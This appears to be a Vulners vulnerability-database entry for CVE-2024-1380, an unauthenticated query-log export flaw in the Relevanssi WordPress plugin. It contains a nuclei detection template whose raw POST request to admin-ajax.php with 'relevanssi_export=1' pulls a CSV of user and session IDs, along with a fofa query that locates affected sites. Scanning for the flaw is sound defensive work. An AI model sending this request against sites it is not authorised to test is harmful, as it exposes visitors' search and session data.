Lucene search

K

Relevanssi (A Better Search) <= 4.22.0 - Query Log Export

🗓️ 01 Jan 1970 00:00:00Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 8 Views

Relevanssi plugin <= 4.22.0 has an unauthorized data export vulnerability, fixed in 4.22.1.

Show more
Related
Refs
Code
ReporterTitlePublishedViews
Family
Prion
Authorization
13 Mar 202416:15
prion
CVE
CVE-2024-1380
13 Mar 202416:15
cve
Vulnrichment
CVE-2024-1380
13 Mar 202415:26
vulnrichment
Cvelist
CVE-2024-1380
13 Mar 202415:26
cvelist
NVD
CVE-2024-1380
13 Mar 202416:15
nvd
WPVulnDB
Relevanssi < 4.22.1 - Unauthenticated Query Log Export
26 Feb 202400:00
wpvulndb
Wordfence Blog
Wordfence Intelligence Weekly WordPress Vulnerability Report (February 19, 2024 to February 25, 2024)
29 Feb 202417:09
wordfence
id: CVE-2024-1380

info:
  name: Relevanssi (A Better Search) <= 4.22.0 - Query Log Export
  author: FLX
  severity: medium
  description: |
    The Relevanssi Search plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check in all versions up to, and including, 4.22.0. This makes it possible for unauthenticated attackers to export the query log data.
  remediation: Fixed in 4.22.1
  reference:
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3033880%40relevanssi&new=3033880%40relevanssi&sfp_email=&sfph_mail=
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/7b2a3b17-0551-4e02-8e6a-ae8d46da0ef8?source=cve
    - https://nvd.nist.gov/vuln/detail/CVE-2024-1380
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-1380
    epss-score: 0.00043
    epss-percentile: 0.0866
    cpe: cpe:2.3:a:relevanssi:relevanssi:*:*:*:*:wordpress:*:*:*
  metadata:
    verified: true
    max-request: 1
    fofa-query: "/wp-content/plugins/relevanssi/"
    product: relevanssi
    vendor: relevanssi
  tags: cve,cve2024,wp,wordpress,wp-plugin,relevanssi,exposure

http:
  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        action=&relevanssi_export=1

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(header, "filename=relevanssi_log.csv", "application/download")'
          - 'contains_all(body, "user_id", "session_id")'
        condition: and
# digest: 4a0a0047304502206670daefbc3824b9d1f15e44e2e2378d4216ff1af40528eaba3db1920eabf467022100d67bb29efe0d2a9c35d6257c33112257b644765ba0dfe74f18a8c9e5c154f5bb:922c64590222798bb761d5b6d8e72950

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
01 Jan 1970 00:00Current
5.1Medium risk
Vulners AI Score5.1
CVSS35.3
EPSS0.001
SSVC
8
.json
Report